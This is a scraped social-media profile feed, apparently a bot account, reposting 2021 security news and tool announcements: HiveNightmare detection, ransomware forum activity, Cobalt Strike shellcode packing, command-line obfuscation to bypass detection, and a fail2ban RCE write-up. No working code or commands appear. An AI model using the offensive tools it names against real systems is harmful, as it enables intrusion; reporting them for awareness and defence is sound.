yaracroft @venom@nanao.cybtex.fr
- mnt-by
- @socat
Robot
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile
Inscrit·e en mar. 2021
Detecting CVE-2021-36934 ( « SeriousSAM » ) with Splunk #vuln #informatique
https://www.splunk.com/en_us/blog/security/detecting-serioussam-cve-2021-36934-with-splunk.html
Praying Mantis - A sophisticated, likely government-sponsored threat actor has been compromising major public and private organizations over the past year by exploiting deserialization flaws in public-facing #Microsoft ASP.NET applications to deploy fileless malware. The malware used by TG1021 shows a significant effort to avoid detection, both by actively interfering with logging mechanisms, successfully evading commercial EDRs and by silently awaiting incoming connections, rather than connecting back to a C2 channel and continuously generating traffic. Furthermore, the threat actor actively removed all disk-resident tools after using them, effectively giving up on persistency in exchange for stealth #cyber #threats
Malware authors are increasingly using rarely spotted programming languages such as #Go, #Rust, #Nim and #DLang in order to create new tools and to hinder analysis. Threat actors have begun to adopt them to rewrite known malware families or create tools for new #malware sets
https://threatpost.com/malware-makers-using-exotic-programming-languages/168117/
Chatter Indicates BlackMatter as #Darkside, #REvil Successor - On July 19, 2021, a threat actor operating under the alias « BlackMatter » registered an account on the high-tier Russian-language illicit forums XSS and Exploit. The actor deposited 4 BTC (~$150,000 USD) into their escrow account. Large deposits on the forum indicate the seriousness of the threat actor. On July 21, 2021, the threat actor posted a notice on the forums, stating they are looking to purchase access to infected corporate networks in the #US, #Canada, #Australia, and the #UK (Five Eyes), presumably for #ransomware operations. The threat actor said they are looking for larger #corporate networks with revenues of over US $100 million. #cyber #threats
https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/
#Microsoft #Windows 11: TPMs & #Digital Sovereignty - « We are here to remind you that the TPM requirement of Windows 11 furthers the agenda to protect the PC against you, its owner. » #drm #tpm
Password spraying and bruteforcing tool for Active Directory Domain Services
Beaconator v1.1 is an aggressor script for Cobalt Strike used to generate a raw stageless #shellcode and packing the generated shellcode using PEzor (an #opensource PE Packer)
Axel Souchet (0vercl0k) recently open-sourced a promising new snapshot-based fuzzer. In his own words: « what the fuzz » or « wtf » is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and or kernel-mode targets running on Microsoft Windows. In this post, we will walk through the process of creating a fuzzer module for what the fuzz, allowing us to fuzz the packet parsing code of a popular triple-A multiplayer game title enjoyed by millions of active players. #fuzzing #informatique
Analysing Qakbot's Browser Hooking Module - Part 1
https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/
#Windows Command-Line Obfuscation : Project for identifying executables that have command-line options that can be obfuscated, possibly bypassing detection rules #python #informatique #tools
Velociraptor - Windows.NTFS.MFT.HiveNightmare : This artifact uses Windows.NTFS.MFT to find several files created as part of the POC tooling for « HiveNightmare » (CVE-2021-36934) #vuln #windows
https://docs.velociraptor.app/exchange/artifacts/pages/windows.ntfs.mft.hivenightmare/
(CVE-2021-32749) fail2ban : The vulnerability, which could be massively exploited and lead to root-level code execution on multiple boxes, however this task is rather hard to achieve by regular person. It all has its roots in mailutils package and I've found it by a total accident when playing with #mail command #linux #informatique
https://research.securitum.com/fail2ban-remote-code-execution/
Un problème #informatique est à l'origine du crash de l'hélicoptère qui a tué six militaires canadiens l'an dernier en #Grèce #aero
The purpose of this post is to document what some Cobalt Strike techniques look like under the hood or to a defender's point of view. Realistically, this post is just breaking down a page straight from Cobalt Strike's website
Les #cyber criminalités n'ont cessés d'augmenter en #Suisse : 85% de cas supplémentaires signalés. Les initiés estiment que le butin mondial de ces crimes se chiffre en centaines de milliards de dollars US par an. « Plus la ruse est élaborée, plus elle est difficile à détecter. » (Nicolas Mayencourt).
Classified documents, allegedly from #Iran, reveal secret research into how a #cyber attack could be used to sink a cargo ship or blow up a fuel pump at a petrol station. Internal files also include information on satellite communication devices used by the global shipping industry as well as a computer-based system that controls things like lights, heating and ventilation in smart buildings across the world. The papers appear to reveal a particular interest in researching companies and activities in western countries, including the #UK, #France and #US. A security source with knowledge of the 57-page bundle of five research reports said it was compiled by a secret, offensive cyber unit called Shahid Kaveh, which is part of Iran's elite Islamic Revolutionary Guard Corps' (IRGC) cyber command #threats
- mnt-by
- @socat
Robot
sc(r)apy | full metal packets
> We Are the Borg
> You Will be Assimilated
> Resistance is Futile
Inscrit·e en mar. 2021
yaracroft recommande :
